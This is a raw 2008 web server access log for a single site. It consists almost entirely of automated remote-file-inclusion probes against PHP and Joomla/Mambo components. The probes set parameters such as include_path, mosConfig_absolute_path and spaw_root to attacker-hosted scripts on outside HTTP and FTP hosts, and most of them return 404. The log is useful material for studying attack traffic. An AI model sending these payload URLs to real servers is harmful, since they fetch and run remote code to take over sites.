66.64.50.3 - - [06/Apr/2008:20:26:51 -0700] "GET /logs/access_080127.log/admin.php?include_path=http://www.9kuukautta.net/verkkokauppa/images/aksi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.232.64.122 - - [06/Apr/2008:20:27:02 -0700] "GET //includes/functions_weblog.php?=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
80.93.56.80 - - [06/Apr/2008:20:27:55 -0700] "GET /logs/access_080224.log//components/com_simpleboard/image_upload.php?sbp=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.93.56.80 - - [06/Apr/2008:20:28:08 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
70.86.152.130 - - [06/Apr/2008:20:28:15 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://shoppingspace.org/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.toulouseangloexchange.com"
70.86.152.130 - - [06/Apr/2008:20:28:16 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://shoppingspace.org/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.toulouseangloexchange.com"
80.93.56.80 - - [06/Apr/2008:20:28:20 -0700] "GET //advguestbook/admin.php?include_path=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.93.56.80 - - [06/Apr/2008:20:28:37 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.93.56.80 - - [06/Apr/2008:20:28:40 -0700] "GET /logs/access_080224.log//components/com_simpleboard/image_upload.php?sbp=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.93.56.80 - - [06/Apr/2008:20:28:41 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.93.56.80 - - [06/Apr/2008:20:28:41 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.93.56.80 - - [06/Apr/2008:20:30:19 -0700] "GET /logs/access_080303.log//components/com_simpleboard/image_upload.php?sbp=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.93.56.80 - - [06/Apr/2008:20:30:52 -0700] "GET /logs/access_080303.log//components/com_simpleboard/image_upload.php?sbp=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.93.56.80 - - [06/Apr/2008:20:32:20 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
77.221.130.3 - - [06/Apr/2008:20:33:36 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.hddshare.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
77.221.130.5 - - [06/Apr/2008:20:35:19 -0700] "GET /logs/access_080204.log//projects/vw_files.php?dPconfig[root_dir]=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
77.221.130.5 - - [06/Apr/2008:20:35:19 -0700] "GET /logs//projects/vw_files.php?dPconfig[root_dir]=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.93.56.80 - - [06/Apr/2008:20:35:27 -0700] "GET /logs/access_080224.log//components/com_simpleboard/image_upload.php?sbp=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.93.56.80 - - [06/Apr/2008:20:35:27 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.93.56.80 - - [06/Apr/2008:20:35:28 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.93.56.80 - - [06/Apr/2008:20:36:59 -0700] "GET /logs/scripts.log//advguestbook/admin.php?include_path=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.93.56.80 - - [06/Apr/2008:20:36:59 -0700] "GET //advguestbook/admin.php?include_path=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.93.56.80 - - [06/Apr/2008:20:36:59 -0700] "GET /logs//advguestbook/admin.php?include_path=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.93.56.80 - - [06/Apr/2008:20:37:01 -0700] "GET /logs/access_080127.log//advguestbook/admin.php?include_path=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.93.56.80 - - [06/Apr/2008:20:37:29 -0700] "GET /logs/access_080303.log//components/com_simpleboard/image_upload.php?sbp=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
77.221.130.3 - - [06/Apr/2008:20:38:00 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.hddshare.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.114.135.126 - - [06/Apr/2008:20:38:35 -0700] "GET /logs/access_080204.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.114.135.126 - - [06/Apr/2008:20:38:35 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
202.142.223.177 - - [06/Apr/2008:20:39:42 -0700] "GET /logs/access_080128.log//index.php/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
202.142.223.177 - - [06/Apr/2008:20:39:42 -0700] "GET //index.php/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
202.142.223.177 - - [06/Apr/2008:20:39:43 -0700] "GET /logs//index.php/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
77.221.130.3 - - [06/Apr/2008:20:40:20 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.hddshare.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
61.67.120.48 - - [06/Apr/2008:20:40:44 -0700] "GET /logs/access_071126.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
61.67.120.48 - - [06/Apr/2008:20:40:45 -0700] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
61.67.120.48 - - [06/Apr/2008:20:40:46 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
61.67.120.48 - - [06/Apr/2008:20:40:47 -0700] "GET /logs/access_071210.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
85.114.135.126 - - [06/Apr/2008:20:40:56 -0700] "GET /logs/access_080225.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
77.221.130.3 - - [06/Apr/2008:20:41:38 -0700] "GET //advguestbook/admin.php?include_path=http://www.hddshare.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
66.64.50.3 - - [06/Apr/2008:20:43:52 -0700] "GET /logs/access.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.9kuukautta.net/verkkokauppa/images/aksi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
66.64.50.3 - - [06/Apr/2008:20:43:53 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.9kuukautta.net/verkkokauppa/images/aksi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
66.64.50.3 - - [06/Apr/2008:20:43:53 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.9kuukautta.net/verkkokauppa/images/aksi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
202.142.223.177 - - [06/Apr/2008:20:44:19 -0700] "GET /logs/access_080127.log//index.php/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
77.221.130.5 - - [06/Apr/2008:20:45:20 -0700] "GET /logs/scripts.log//advguestbook//admin.php?include_path=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
77.221.130.5 - - [06/Apr/2008:20:45:21 -0700] "GET /logs//advguestbook//admin.php?include_path=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
77.221.130.5 - - [06/Apr/2008:20:45:27 -0700] "GET /logs/access_080127.log//advguestbook//admin.php?include_path=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
60.249.42.221 - - [06/Apr/2008:20:47:45 -0700] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.246.192.39 - - [06/Apr/2008:20:47:49 -0700] "GET //admin.php?include_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.34.169.20 - - [06/Apr/2008:20:48:09 -0700] "GET //admin.php?include_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
77.221.130.3 - - [06/Apr/2008:20:48:51 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.hddshare.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
61.222.36.82 - - [06/Apr/2008:20:49:28 -0700] "GET /logs/access.log//includes/functions_weblog.php?=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
61.222.36.82 - - [06/Apr/2008:20:49:36 -0700] "GET //includes/functions_weblog.php?=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
77.221.130.3 - - [06/Apr/2008:20:51:35 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.hddshare.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
72.3.238.151 - - [06/Apr/2008:20:55:51 -0700] "GET /logs/access_080224.log/index.php?pageurl=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
72.3.238.151 - - [06/Apr/2008:20:55:52 -0700] "GET /index.php?pageurl=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
72.3.238.151 - - [06/Apr/2008:20:55:52 -0700] "GET /logs/index.php?pageurl=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
207.58.179.218 - - [06/Apr/2008:20:56:00 -0700] "GET /logs/scripts.log//admin.php?include_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.58.179.218 - - [06/Apr/2008:20:56:00 -0700] "GET //admin.php?include_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.58.179.218 - - [06/Apr/2008:20:56:00 -0700] "GET /logs//admin.php?include_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.58.179.218 - - [06/Apr/2008:20:56:00 -0700] "GET /logs/scripts.log//admin.php?include_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.58.179.218 - - [06/Apr/2008:20:56:00 -0700] "GET //admin.php?include_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.58.179.218 - - [06/Apr/2008:20:56:00 -0700] "GET /logs//admin.php?include_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.58.179.218 - - [06/Apr/2008:20:56:00 -0700] "GET /logs/access_080127.log//admin.php?include_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.58.179.218 - - [06/Apr/2008:20:56:01 -0700] "GET /logs/access_080127.log//admin.php?include_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.58.179.218 - - [06/Apr/2008:20:56:01 -0700] "GET /logs/scripts.log//admin.php?include_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.58.179.218 - - [06/Apr/2008:20:56:01 -0700] "GET //admin.php?include_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.58.179.218 - - [06/Apr/2008:20:56:01 -0700] "GET /logs//admin.php?include_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.58.179.218 - - [06/Apr/2008:20:56:01 -0700] "GET /logs/access_080127.log//admin.php?include_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.3.238.151 - - [06/Apr/2008:20:56:24 -0700] "GET /logs/access_080204.log/index.php?pageurl=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
66.64.50.3 - - [06/Apr/2008:20:59:31 -0700] "GET /logs/access.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.9kuukautta.net/verkkokauppa/images/aksi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
66.64.50.3 - - [06/Apr/2008:20:59:32 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.9kuukautta.net/verkkokauppa/images/aksi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
66.64.50.3 - - [06/Apr/2008:20:59:33 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.9kuukautta.net/verkkokauppa/images/aksi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.226.60.4 - - [06/Apr/2008:20:59:38 -0700] "GET /logs/access_080211.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
74.220.215.233 - - [06/Apr/2008:20:59:49 -0700] "GET /logs/access.log/index.php?visualizar=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.220.215.233 - - [06/Apr/2008:20:59:49 -0700] "GET /index.php?visualizar=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.220.215.233 - - [06/Apr/2008:20:59:50 -0700] "GET /logs/index.php?visualizar=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
77.221.130.3 - - [06/Apr/2008:21:00:03 -0700] "GET /logs/scripts.log//advguestbook/admin.php?include_path=http://www.hddshare.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
77.221.130.3 - - [06/Apr/2008:21:00:03 -0700] "GET /logs//advguestbook/admin.php?include_path=http://www.hddshare.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
77.221.130.3 - - [06/Apr/2008:21:00:10 -0700] "GET /logs/access_080127.log//advguestbook/admin.php?include_path=http://www.hddshare.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.234.144.44 - - [06/Apr/2008:21:00:17 -0700] "GET /logs/access_080211.log/akocomments.php?mosConfig_absolute_path=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
85.234.144.44 - - [06/Apr/2008:21:00:17 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
85.234.144.44 - - [06/Apr/2008:21:00:17 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.192.39 - - [06/Apr/2008:21:00:19 -0700] "GET /logs/scripts.log//admin.php?include_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.192.39 - - [06/Apr/2008:21:00:19 -0700] "GET //admin.php?include_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.192.39 - - [06/Apr/2008:21:00:19 -0700] "GET /logs//admin.php?include_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.192.39 - - [06/Apr/2008:21:00:26 -0700] "GET /logs/access_080127.log//admin.php?include_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.34.169.20 - - [06/Apr/2008:21:00:31 -0700] "GET /logs/scripts.log//admin.php?include_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
64.34.169.20 - - [06/Apr/2008:21:00:31 -0700] "GET //admin.php?include_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
64.34.169.20 - - [06/Apr/2008:21:00:31 -0700] "GET /logs//admin.php?include_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
64.34.169.20 - - [06/Apr/2008:21:00:36 -0700] "GET /logs/access_080127.log//admin.php?include_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
85.234.144.44 - - [06/Apr/2008:21:00:54 -0700] "GET /logs/access_080128.log/akocomments.php?mosConfig_absolute_path=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.220.215.233 - - [06/Apr/2008:21:01:14 -0700] "GET /logs/access_080128.log/index.php?visualizar=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
60.249.45.142 - - [06/Apr/2008:21:02:34 -0700] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
77.221.130.5 - - [06/Apr/2008:21:04:11 -0700] "GET /logs/access_080128.log//projects/vw_files.php?dPconfig[root_dir]=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.234.144.44 - - [06/Apr/2008:21:04:41 -0700] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
85.234.144.44 - - [06/Apr/2008:21:04:51 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
85.234.144.44 - - [06/Apr/2008:21:04:51 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
85.234.144.44 - - [06/Apr/2008:21:05:14 -0700] "GET /logs/access_080211.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
85.234.144.44 - - [06/Apr/2008:21:05:15 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
85.234.144.44 - - [06/Apr/2008:21:05:15 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
60.249.45.142 - - [06/Apr/2008:21:06:02 -0700] "GET /logs/access_071231.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
61.67.120.48 - - [06/Apr/2008:21:06:04 -0700] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
60.249.45.142 - - [06/Apr/2008:21:06:08 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
65.93.30.27 - - [06/Apr/2008:21:06:36 -0700] "GET /logs/access_080121.log HTTP/1.0" 200 4870279 "http://www.iaea.org" "Mozilla/3.0 (compatible)" "www.toulouseangloexchange.com"
61.67.120.48 - - [06/Apr/2008:21:10:13 -0700] "GET /?mosConfig_absolute_path=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 200 919 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
213.215.80.102 - - [06/Apr/2008:21:15:06 -0700] "GET /logs/access_080211.log/myevent.php?myevent_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.215.80.102 - - [06/Apr/2008:21:15:06 -0700] "GET /myevent.php?myevent_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.215.80.102 - - [06/Apr/2008:21:15:07 -0700] "GET /logs/myevent.php?myevent_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.114.135.126 - - [06/Apr/2008:21:19:56 -0700] "GET /myevent.php?myevent_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
81.89.137.99 - - [06/Apr/2008:21:20:29 -0700] "GET /logs/access_080121.log/myevent.php?myevent_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
81.89.137.99 - - [06/Apr/2008:21:20:29 -0700] "GET /myevent.php?myevent_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
81.89.137.99 - - [06/Apr/2008:21:20:29 -0700] "GET /logs/myevent.php?myevent_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
62.116.137.98 - - [06/Apr/2008:21:20:58 -0700] "GET /components/com_extcalendar/gigcal.searchbot.php?mosConfig_absolute_path=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
213.215.80.102 - - [06/Apr/2008:21:21:28 -0700] "GET /logs/access_080128.log/index.php?inc=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.215.80.102 - - [06/Apr/2008:21:21:29 -0700] "GET /index.php?inc=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.215.80.102 - - [06/Apr/2008:21:21:29 -0700] "GET /logs/index.php?inc=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
81.89.137.99 - - [06/Apr/2008:21:21:55 -0700] "GET /logs/access_080211.log/myevent.php?myevent_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
